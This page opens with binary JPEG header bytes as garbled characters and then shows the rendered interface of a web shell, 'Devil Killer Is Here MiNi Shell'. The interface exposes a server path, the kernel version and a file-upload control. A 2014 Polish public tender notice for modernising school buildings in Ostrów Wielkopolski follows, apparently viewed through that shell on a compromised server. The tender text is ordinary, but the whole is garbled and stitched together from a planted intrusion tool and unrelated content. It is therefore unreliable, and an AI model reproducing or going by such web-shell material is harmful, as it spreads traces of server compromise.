JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/157248-N-2014.html

<p class="kh_header"><b>Ostrów Wielkopolski: Termomodernizacja i przebudowa  budynków przy ul.Wolności 10 i 12 w Ostrowie Wielkopolskim - ETAP VI</b><br>
<b>Numer ogłoszenia: 157248 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Usługowych , ul. Wolności 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 0 62 736 51 82, faks 0 62 736 51 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zsu.osw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja i przebudowa  budynków przy ul.Wolności 10 i 12 w Ostrowie Wielkopolskim - ETAP VI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Zakres robót obejmuje dokończenie termomodernizacji i przebudowy 
BUDYNKU UL. WOLNOŚCI 10:
1.    KONSTRUKCJA  SALI  WIDOWISKOWEJ
       1.1  Słupy  prostokątne  żelbetowe  C25 30  -  6,649  [m3],
       1.2  Podciąg  żelbetowy  nad  C25 30  nad  patrerem  -  1,87  [m3],
       1.3  Rozebranie  stropu drewnianego  II  piętra  -  195,88  [m2],
       1.4  Wieniec  żelbetowy  C25 30  0,25 0,25  -  3,827  [m3],
       1.5  Płyta  stropowa  żelbetowa  C25 30  gr.  17  [cm]  -  33,007  [m3],
       1.6  Schody  zelbetowe C25 30 n proste  -  11,52  [m2]
2.    KONSTRUKCJA  STROPU  NAD  SALĄ  WIDOWISKOWĄ
       2.1  Podmurówka  pod  wieniec  żelbetowy  z  cegły  ceramicznej  pełnej  kl.  15  [MPa]  na
              zaprawie  cementowej,  ankrowana  do  istniejącego  muru  -  52,65  [m2],
       2.2  Wieniec  żelbetowy  C2530,  25 42  [cm]  -  6,143  [m3],
       2.3  Podciąg  poprzeczny  żelbetowy  C2530,  40105  [cm]   nad  sala  widowiskową  -  10,088
              [m3],
       2.4  Podciąg  podłużny  większy  żelbetowy  C2530,  3040  [cm]  nad  slą  widowiskową  -  2,076
              [m3],
       2.5  Podciąg  podłużny  mniejszy  żelbetowy  C2530,  3040  [cm]  nad  slą  widowiskową  -
              1,594  [m3],
       2.6  Strop  gęstożebrowy  Acermana  -  148,434  [m2],
       2.7  Płyta  żelbetowa   C25 30  gr.  15,0  [cm],   poprzeczna  -  4,337  [m3],
       2.8  Wzmocnienie  wszystkich  istniejacych  ram  konstrukcji  dachu  za  pośrednictwem
               kratownicy  gdrewnianej   o  wyskości  1,0  [m]   -  długość  łączna  pasa  górnego  i  dolnego
               -  291,836  [m],
       2.9  Odboje  deszczowe  przy  kominach  -  10,914  [m2].

3.    WYDZIELONA  KLATKA  SCHODOWA
      3.1  Dostawa  i  montaż,  drzwi zewnętrzne,  drewniane,  dębowe,  przeszklone, dwuskrzydłowe o
             powierzchni ponad 1.5 m2  pełniące  również  rolę  kalapy  nawiewu  powietrza  do 
             wydzielonej  klatki  schodowej.  -  4,469  [m2],
      3.2  Rozebranie posadzek z płytek ceramicznych  -  98,776  [m2],
      3.3  Okładziny schodów z płyt o stosunku obwodu do pow.do 10 mm2 z granitu  Yellow  Rock
             gr.  2,0 2,5  [cm].  (nastopnice  i  podstopnice  jednoelementowe,  minimalny  wymiar  płyty
             granitowej  podestu  100 x 100  [cm])  -  162,169  [m2],
      3.4  Balustrady schodowe ze  stali  nierdzewnej  satynowanej wypełnione elementami płyt  ze

             szkła  bezpiecznego,  przymocowane do belek policzkowych śrubami  ze  stali  nierdzewnej  -
             29,05  [m],
      3.5  Pochwyt schodowy ze  stali  nierdzewnej  satynowanej   przymocowane do ścian śrubami  ze
             stali  nierdzewnej  -  29,5  [m],
      3.6  okno połaciowe  -  klapa  dymowa  automatyczna  o  powierzchni  czynnej  oddymiania  0,82
             [m2]  114 x 140  [cm]  np.  typu  GGL  306040  VELUX  z  systemowym  kołnierzem.  System
             składa się ze sterowanego elektrycznie obrotowego okna VELUX z siłownikami gazowymi
             przyspieszającymi otwieranie, fabrycznie zamontowanego napędu wentylacji oddymiającej 
              -  2  [kpl.],
      3.7  płyty PROMAXTON  typ  A  gr.  25  [mm]  -  20,482  [m2],
      3.8  Dwukrotne malowanie farbami latexowymi starych tynków wewnętrznych sufitów  -  104,72
             [m2],
      3.9  Dwukrotne malowanie farbami latexowymi  starych tynków wewnętrznych ścian  -  305,093
             [m2].

4.    WITRYNY  P.POŻ.
      4.1  Drzwi aluminiowe dwuskrzydłowe  +  witryna  (p-.poż.  EI30,  EI60)  -  24,35  [m2].
5.    TERMOMODERNIZACJA  STROPU  PODDASZA
       5.1  Rozebranie ścianek działowych z dwóch warstw desek tynkowanych  -  227,533  [m2],
       5.2  Rozebranie podsufitek z desek otynkowanych  -  306,965  [m2],
       5.3  Folie wstępnego krycia (paroszczelna)  -  386,489  [m2],
       5.4  płyty z wełny mineralnej  gr.  2 x 10  [cm]  (lambda = 0,039W/mK,  Klasyfikacja ogniowa 
              w zakresie reakcji na ogień  A2-s1,d0)  -  257,659  [m2],
       5.5  folia dachowa (FWK) z tworzywa sztucznego  (paroprzepuszczalna)  [Równoważna grubość 
              warstwy powietrza Sd mniejsze,  równe 0,004m.  Przepuszczalność pary wodnej: 2000 g / 
              (m2 (24h))]  -  257,659  [m2]
6.    ZWIĘKSZENIE  ODPORNOŚCI  OGNIOWEJ  STROPÓW
       6.1  Zabezpieczenie  stropu  od  strony  sufitu  płytami  ognioochronnymi  PROMATECT - H,  
              gr.  2 x 10 = 20 [mm],  bezpośrenio  do  tynku  i  uzyskanie  REI 60  dla  stropu  -  855,41 
              [m2],
7.    ŚCIANY  I  SUFITY
       7.1  Wykonanie przesklepień otworów w ścianach z cegieł - dostarczenie i obsadzenie belek
              stalowych do I NP 180 mm  -  139,3  [m],
       7.2  dostawa  i  montaż  -  podokienniki  wewnętrzne  prefabrykowane  z  konglomeratu,  gr.  Min
           .  3,0  [cm],  wystające  poza  lico  muru  5,0  [cm],  szersze  od  światła  otworu  wewnętrznego
              okna  z  każdej  strony  o  5,0  [cm],  krawędzie  zfazowane  -  28  [szt.],
       7.3  Okładziny z płyt gipsowo-kartonowych (suche tynki gipsowe) pojedyncze na słupach, belkach
              i ościeżach na zaprawie  -  84,139  [m2],
       7.4  Gładzie gipsowe gr. 3 mm jednowarstwowe na ścianach na podłożu z tynku w 
              pomieszczeniach o pow. podłogi ponad 5 m2  (wraz  z  wyprowadzeniem  narożników  ścian)
              -  762,140  [m2],
       7.5  Dwukrotne malowanie farbami latexowymi starych tynków wewnętrznych sufitów  -  368,410
              [m2],
       7.6  Dwukrotne malowanie farbami latexowymi  starych tynków wewnętrznych ścian  -  762,140
              [m2],
       7.7  Okładziny ścienne z płytek z kamieni sztucznych o regularnych kształtach układanych we
              wzory na zaprawie klejowej cienkowarstwowej; płytki o wymiarach 30x60 cm  -  23,87  [m2],
       7.8  Dostawa  i  montaż  lustra   wymiarach  240 x 90  [cm]  (szlif  krawędziowy  2,0  [cm])  - 
              63,160  [m2],
       7.9  Okładziny stropów płytami gipsowo-kartonowymi na ruszcie metalowym podwójnym
              podwieszonym z kształtowników CD i Ud  -  93,7  [m2],
8.    ROBOTY  WYKOŃCZENIOWE  SALI  WIDOWISKOWEJ
       8.1  Dostawa,  montaż,  wykończenie  sceny  wraz  z  schodami  wejściowymi  -  78,178  [m2],
       8.2  Parkiet  przemysłowy  dębowy na  widowni  -  163,103  [m2],
       8.3  Dostawa,  montaż,  osadzenie  wszelkich  anemostatów  i  opraw  elektrycznych  -  sufity 
              podwieszone o konstrukcji metalowej z wypełnieniem płytami z włókien mineralnych  -
              akustyczny  -  167,34  [m2],
       8.4  Dostawa  i  montaż  -  okładziny z paneli systemowych, dźwiękochłonnych na ścianach  
              -  149,822  [m2],
       8.5  Dostawa,  montaż  -  balustrady proste z pochwytem stalowym  ze  stali  nierdzewnej
              satynowanej  (poręcz  do  sali  widowiskowej)  na  wysokości  1,1  [m]  -  33,945  [m2],
       8.6  Dwukrotne malowanie farbami latexowymi starych tynków wewnętrznych sufitów  -  55,75
              [m2],
       8.7  Dwukrotne malowanie farbami latexowymi  starych tynków wewnętrznych ścian  -  108,521
              [m2],
       8.8  ościeżnice drewniane  regulowane  fabrycznie  wykończone,  z  drewna  dębowego, 
              klejonego  warstwowo  na  całą  grubość  muru,  portal, w  wybarwieniu skrzydła 
              drzwiowego,  próg  z  lakierowanego  drewna  dębowego gr.  2,4  [cm]  o  szerokości  54
              [cm],  wpuszczony  w  podłogę,  EI 60  -  8.717  [m2],
       8.9  skrzydło drzwiowe wewnętrzne o  płaszczyznach  gładkich  jednopowierzchniowych 
              z  drewna  dębowego,  klejonego  warstwowo,  pełne jednoskrzydłowe, w  wybarwieniu
              nsturalnym,jasnym,  fabrycznie wykończone  gr. min.  45  [mm].  zawiasy  -  5  na  skrzydło, 
              zamek  patentowy,  klamka  obustronna,  szyldy  odbojnik  na  klamkę,  dźwignia  antypanik,
              EI 60  -  5,006  [m2],
       8.10  Lakierowanie posadzek i parkietów  -  260,707  [m2],
       8.11  Dostawa  i  montaż  pomostu  roboczego  -  kratownicy  przestrzennej  z  kształtowników
              zamknietych  ze  stali  nierdzewnej  satynowanej  służacej  jako  baza  do  zawieszania 
              oswietlenia  elektrycznego  portalu  scenicznego.  Przekrój  kratownicy  przestrzennej  400 x
              400  [mm],  długość  ca  11,21  [cm].  Montowana  do  ścian  ceglanych.  -  11,21  [m],
9.     STOLARKA  DRZWIOWA
        9.1  skrzydła drzwiowe wewnętrzne  drewniane płytowe,  fabrycznie  wykończone, okleina
               naturalna   w  komplevcie  z  ościeżnicą  regulowaną  na  pełną  grubość  muru  -  25,723 
               [m2].
10.   ROBOTY  WYKOŃCZENIOWE
        10.1  Dostawa,  montaż  i  uruchomienie  suszarek  do  rąk  230  [V]  w  wykonaniu
                 antywandalowym,  obudowa  ze  stali  nierdzewnej  satynowanej,  uruchamianie
                  fotokomórką  -  10 [kpl.],
        10.2  systemowe  listwy  odbojowe  200 x 35  [mm] -  Wysokowytrzymała okładzina z tworzywa
                 sztucznego oraz konstrukcja nośna z aluminium  -  54,8  [m].

11.  WYSTRÓJ  GALERII
       11.1  Sufity podwieszone o konstrukcji metalowej z wypełnieniem płytami z włókien mineralnych
                np.  -  Ecophon  Focus TM  600 x 600  [mm]  na  konstrukcji  systemowej  Ecophon
                Connect  -  30,24  [m],
       11.2  Dostawa  i  montaż  konstrukcji metalowej do wypełnieniem oprawami  oświetleniowymi -
                np.  na  konstrukcji  systemowej  Ecophon  Connect  -  zgodnie  z  rysunkiem  wystroju 
                wnętrz  (sufit)  -  pod  oświetlenie  systemowe  w g  projektu  branży  elektrycznej  -  11,52
                 [m2],
12.  ROBOTY  MUROWE,  KOMIONY  WENTYLACYJNE
       12.1  Kominy wolnostojące z cegieł w budynkach wieloprzewodowe  -  16,662  [m3],
       12.2  Obróbki przy szerokości w rozwinięciu ponad 25 cm - z blachy z tytan - cynku  -  28,407
                [m2], 12.3  
13.  POSADZKI
       13.1  Mechaniczne szlifowanie starych posadzek z deszczułek  -  300,99  [m2],
       13.2  Trzykrotne lakierowanie posadzek  -  345,139  [m2],
       13.3   Wymiana cokołów 2x10 cm z drewna liściastego  (zlicowane  powierzchnią  zewnętrzną  
                 z  licem  tynku  na  ścianie  -  jedna  płaszczyzna)  -  211,67  [m2].
1.    INSTALACJE  SANITARNE
       1.1  Dostawa,  montaż  i  uruchomienie  -  pisuary  pojedyńcze  z  płuczką  -  5  kpl.
       1.2  Dostawa,  montaż  i  uruchomienie  -  zlew  żeliwny  emaliowany  -  2  kpl.
       1.3  Dostawa,  montaż  i  uruchomienie  -  zlewozmywak  z  konglomeratu  -  2  kpl.
 
2.    KLIMATYZACJA  SALI  WIDOWISKOWEJ
       2.1  Dostawa,  montaż  konstrukcji  wsporczej  ze  stali  nierdzewnej  pod  jednostki
              klimatyzacyjne  zewnętrzne  -  20  [kg]
       2.2  Dostawa  i  montaż  dystrybutorów  instalacji  klimatyzacji  np.  typu  PMBD3630 do 
              konstrukcji -  2  kpl.
       2.3  Dostawa,  montaż,  sprawdzenie  szczelności  -  rurociągi  z  rur  miedzianych  -  40  [kg]
       2.4  Kompletna  dostawa  i  montaż  jednostki  wewnętrznej  instalacji  klimatyzacji np.  typu  CB 12L.N22  Standard  Inverter  (jednostka  wewnętrzna  kanałowa  niskiego  sprężu)  -  6  [kpl.]
       2.5  Kompletna  dostawa  i  montaż  jednostki  wewnętrznej  instalacji  klimatyzacji typu  np.  CT 12.NR2  Standard  Inverter  (jednostka  wewnętrzna kasetonowa)  -  2  kpl.
       2.6  Dostawa,  montaż,  sprawdzenie  szczelności  -  rurociągi z rur miedzianych w instalacji
              obiegu freonu o śr. 10 mm  -  36  [kg]
       2.7  Dostawa,  montaż,  podłączenie  i  sprawdzenie  szczelności  -  rurociągi polietylenowe 
              Geberit HDPE kanalizacyjne o śr. zewn. 32-56 mm o poł. zgrzewanych na ścianach
              budynków  -  107  [m]
       2.8  Dostawa,  montaż  i  uruchomienie  -  rozdzielnia  elektryczna  klimatyzacji  -  1  kpl.
       2.9  Dostawa,  ułożenie,  podłączeanie,  przewody kabelkowe  YDYp 5 x 2,5  450 750 [V]  -  136
              [m]
       2.10  Dostawa,  ułożenie,  podłączenie  -  przewody kabelkowe  YDYp 4 x  1,25  450 750 [V] 
              (zasilanie  dystrybutorów) -  30,0 [m]
       2.11  Dostawa,  ułożenie,  podłaczenie  -  przewody kabelkowe  YDYp 4 x  0,75  450 750 [V]
              (zasilanie  jednostek  wewnętrznych)  -  80,0  [m]
3.    INSTALACJA  ELEKTRYCZNA  -  BIAŁY  MONTAŻ     
       3.1  Dostawa,  montaż,  uruchomienie  -  oprawy żarowe do przykręcania  np.  typu  MODENA
              MINI 60W A60/E27 (PX3004001),  IP54  -  16  [kpl.]
       3.2  Dostawa,  montaż,  uruchomienie  -   oprawy żarowe do przykręcania  (np. MODENA  MINI
              60W  A60 E27  IP54   (PX 30040001)  -  4  [kpl.]
       3.3  Dostawa,  montaż,  uruchomienie  -  oprawy żarowe do przykręcania  -  oprawy świetlówkowe 
             do przykręcania  (np.  Philips  Arano TCS640  4 x 14 W 840 HFP  M2 ALU)  -  wykorzystać
             oprawy  z  odzysku  (aktualnie  zamontowane  na  sufitach)  -  108  [kpl].
       3.4  Dostawa,  montaż,  uruchomienie  -  oprawy świetlówkowe  do przykręcania  (np.  Philips
              Arano TCS640  3 x 14 W/840 HFP  M2 ALU)    wykorzystać  oprawy  z  odzysku  (aktualnie
              zamontowane  na  sufitach)  -  28  [kpl.]
       3.5   Dostawa,  montaż,  uruchomienie  -  oprawy świetlówkowe  do przykręcania  -  (np.  MONZA
              II  PAR  2 x 54 [W] T5 G5 (PX 2200136)  -  4  [kpl.]
       3.6   Dostawa,  montaż,  uruchomienie  - oprawy świetlówkowe  do przykręcania   -  oprawy
               świetlówkowe  do przykręcania  (np.  Philips  Finess TCS198  4 x TL - D18W  HFP  M6)  -  
               3  [kpl.]
       3.7   Dostawa,  montaż,  uruchomienie  -  oprawy świetlówkowe  do przykręcania  -  oprawy
               żarowe do przykręcania  np.  typu  MODENA MINI 60W A60/E27 (PX3004001),  IP54  -  3
               [kpl.]
       3.8   Dostawa,  montaż,  uruchomienie  -  oprawy ledowe zintegrowane wpuszczane  (np.  Panel
               TT  LED  600 x 600  36W  (PX 0890145)  -  32  [szt.]
       3.9   Dostawa,  montaż,  uruchomienie  -  oprawy oświetleniowe  do  szynoprzewodu  (np.
               Philips  ST340T 1XSLED1700/830 PSU MB IIWH)  -  22  [kpl]
        3.10 Dostawa  i  montaż i  podłaczenie  przewodu szynowego 25A (M04) na gotowej konstrukcji 
                wsporczej -  komplet  (galeria)  -  24,5  [m]
        3.11 Dostawa,  montaż,  przyłączenie  i  uruchomienie  -  kompaktowy  reflektor  ledowy do
                przykręcania  (np. LEVATO  N 3h  firmy  AWEX)  -  114  [kpl.]
        3.12 Dostawa,  montaż,  uruchomienie  -  łącznik  instalacyjny  400 [V]  -  36  [kpl.]
        3.13 Dostawa,  montaż,  uruchomienie  -  łączniki instalacyjne  230  [V],  IP44  -  12,0  [kpl.]
        3.14 Dostawa,  montaż,  uruchomienie  -  montaż do gotowego podłoża gniazd wtyczkowych
                podtynkowych 2-biegunowych z uziemieniem 10A/2.5 mm2 przelotowych podwójnych  -  
                 66  [kpl.]
        3.15 Dostawa,  montaż,  uruchomienie  do gotowego podłoża gniazd wtyczkowych 
                podtynkowych 2-biegunowych z uziemieniem 10A/2.5 mm2 przelotowych podwójnych
                (IP44)  -  15  [kpl.]
        3.16  Dostawa,  montaż  i  uruchomienie  gniazd  zintegrowanych  napięcia  dedykowanego 
                 do  komputerów  ,  zapewniających  4  gniazda  230  [v],  gniazda  telefoniczne 2 x RJ45 
                 i  gniazda  internetowe  2 x RJ45  (2  PL).  -  6  [kpl.]
        3.17  Dobór,  dostawa,  montaż  i  uruchomienie  -  falownik  2,2  [kw]  do  regulacji  prędkości 
                 obrotowej  wentylatora  dachowego  -  6  [kpl.]
        3.18  Dostawa,  montaż i  uruchomienie dodatkowego  sprzętu  modułowego  w  rozdzielnicach
                 elektrycznych  na  każdej  kondygnacji  -  3  [kpl.]
        3.19  Dostawa,  montaż,  wyposażenie,  podłączenie  kompletnej  RK   1 1  -  1  [kpl.]

4.    INSTALACJA  ELEKTRYCZNA  -  BIAŁY  MONTAŻ  -  SALA  WIDOWISKOWA
       4.1  Dostawa,  ułożenie,  sprawdzenie  kabla  głosnikowego  z  miedzi  beztlenowej  2 x 2,5 mm2
              OFC,  (np.  TONSIL  lub  inny  równoważny), układane w gotowych bruzdach na podłożu
              innym niż beton  (szafa  rack  w  3 9)  -  273,6  [m]
       4.2  Dostawa,  ułożenie  i  podłączenie  -   przewody kabelkowe  YDY  3 x 2,5/750[V] [mm]2  -
              518,6  [m]
       4.3  Dostawa,  ułożenie  i  podłączenie  -  przewody kabelkowe  YDY  3 x 1,5  [mm]2 50[V]  -
               571,5  [m]
       4.4  Dostawa,  montaż  i  podłączenie  -    oprawy ledowe  wpuszczane  zintegrowane  z  źródłem 
              światła  (np.  Philips  CoreLein  ProSet  RS120B LED6 - 40 - /840 PSR WH)  -  28  [kpl.]
       4.5  Dostawa,  montaż  i  podłączenie  -  oprawy ledowe  wpuszczane   (np.  Philips  Eugato
              Oerformance  FBS271 1 x PLL-C4P26W840 HFP C PI WH)  -  24  [kpl.]
       4.6  Dostawa,  montaż  i  podłączenie  -  kompaktowy  reflektor  ledowy do przykręcania  
              (np.  LED PAR 64 wyposażony  w  186 10 mm  diod  LED RGBW)  -  18  [kpl.]
       4.7  Dostawa,  montaż  i  podłączenie  -  reflektor PC 7-38 1200W z  osprzętem  -  4  [kpl.]
       4.8  Dostawa,  montaż  i  podłączenie  -  oprawy ledowe  wpuszczane   (np.  LEVATO P 3h firmy
              AWEX)  -  18  [kpl.]
       4.9  Dostawa,  montaż  i  podłączenie  -  kompaktowy  reflektor  ledowy do przykręcania  (np.
              LEVATO  N 3h  firmy  AWEX)  -  6  [kpl.]
       4.10 Dostawa  i  montaż  oraz  uruchomienie  oświetlenia  przeszkodowego  w  podstopnicach 
              schodów  sali  widowiskowej  (LED)  -  26  [kpl.]
       4.11 Dostawa,  montaż  i  uruchomienie  Regulatora (dimer) 4-kanałowego.  HUB  DMX  
               zlokalizować  na  scenie.  Pomiędzy  HUB  a  komputerem  wykonać  połączenia  UTP 
               zakończone  gniazdami  po  obu  stronach.  Komputer  należy  dostarczyć  z  kompletnym 
               oprogramowaniem  -  2  [kpl.]
       4.12  Dostawa,  montaż  i  podłączenie  -  gniazda  wtyczkowe  230  [V]  -  14  [kpl.]
       4.13  Dostawa,  montaż  i  podłączenie  -  gniazda metalowe 16 A 2-biegunowe  -  16  [kpl.]
       4.14  Dostawa,  montaż  i  podłączenie  -  gniazda  DMXX x 4  -  6  [kpl.]
       4.15  Dostawa,  montaż,  uruchomienie  uchyłu  okien  dla  nawiewu  powietrza  do  sali 
                widowiskowej  w  elewacji  zachodniej  za  pośrednictwem siłowników  elektrycznych 
                sterowanych  skokowo  przyciskiem  zlokalizowanym  w  obrębie  ościeża  drzwi  Sali
                widowiskowej  w  kasecie  zamykanej  kluczem  systemowym  -  3  [kpl.]
       4.16  Dostawa,  montaż,  podłączenie,  uruchomienie  i  sprawdzenie  poprawności  działania
               układu  wyciągowego  -  wentylator  dachowy  ?250 [mm],  wydatek  maks.  2500  [m 3h], 
               Napięcie  400[V],  stopień  ochrony  IP54,  Charakterystyka  akustyczna  na  wylocie  w
               odległości  5[m] - 50[dB],  na  wlocie  w  odległości  5,0  [m] - 45  [db].  Regulacja  obrotów
               silnika  wentylatora,  falownikiem  w  odniesieniu  do  każdego  komina.  Wentylator 
               osadzony  za  pośrednictwem  tłumika  ograniczającego  moc  akustyczną , o   nie  mniej  niż 
               15  [dB]  i  podstawy  dachowej  do  żelbetowej  czapki  komina.  (Np.  SMART - 250 1000
                lub  inny  równoważny  i  spełniający  powyższy  opis).  -  6  [kpl.]
5.   SYSTEM  SYGNALIZACJI  NAPADU  I  WŁAMANIA
      5.1  Dostawa,  ułożenie  i  sprawdzenie  kabla  okablowania  strukturalnego  -  203,333  [m]
6.    MONITORING
       5.2  Dostawa,  ułożenie  i  sprawdzenie  kabla  okablowania  monitoringu  -  352,0  [m]
7.    INSTALACJA  SAP        
       7.1  Dostawa,  ułożenie,  podłączenie  -  przewody kabelkowe  YnTKSY 4x2x0.8  -  275,5  [m]
       7.2  Dostawa,  ułożenie,  podłączenie  -  przewody kabelkowe  YDYp 3x,1,5  -  48,0  [m]
       7.3  Dostawa,  ułożenie,  podłączenie  -  przewody kabelkowe  HDGS 3x1.5 mm2  PH90  -  66,0
              [m]
       7.4  Dostawa,  montaż,  podłączenie  -  Montaż czujek pożarowych - liniowa dymu lub
               nadmiarowa temperatury  -  45  [kpl.]
       7.5  Dostawa,  montaż,  podłączenie  -   czujek pożarowych - nadmiarowa temperatury  -  2  [kpl.]     
       7.6  Dostawa,  montaż,  podłączenie  - czujek pożarowych - liniowa dymu DOP 40  -  2  [kpl.]       
       7.7  Dostawa,  montaż,  podłączenie  - czujek pożarowych -  reflektor  pryzmowy  do  współpracy
              z  czujką  liniową dymu DOP 40  -  2  [kpl.]
       7.8   Dostawa,  montaż,  podłączenie  i  uruchomienie  -  siłowników  do  drzwi  zewnętrznych  -  2
               [kpl.]
       7.9   Dostawa,  montaż,  podłączenie  i  uruchomienie  - elektromechanicznych elementów
               blokujących - zwora elektromagnetyczna  -  4  [kpl.]
       7.10 Dostawa,  montaż,  podłączenie  i  uruchomienie  -  centrali  oddymiania  -  1  [kpl.]
       7.11 Dostawa,  montaż,  podłączenie  i  uruchomienie  -  centrali  p.poż.  -  1  [kpl.]    
       7.12 Dostawa,  montaż,  podłączenie  i  uruchomienie  czujnika  pogodowego  -  1  [kpl.]      
       7.13  Dostawa,  montaż,  podłączenie  i  uruchomienie  -   kompaktowej centrali alarmowej 
                do 16 linii dozorowych  -  1  [kpl.].   
 kompletne z punktu widzenia celu, któremu ma służyć.

3.2. Przedmiot zamówienia opisują następujące dokumenty: 
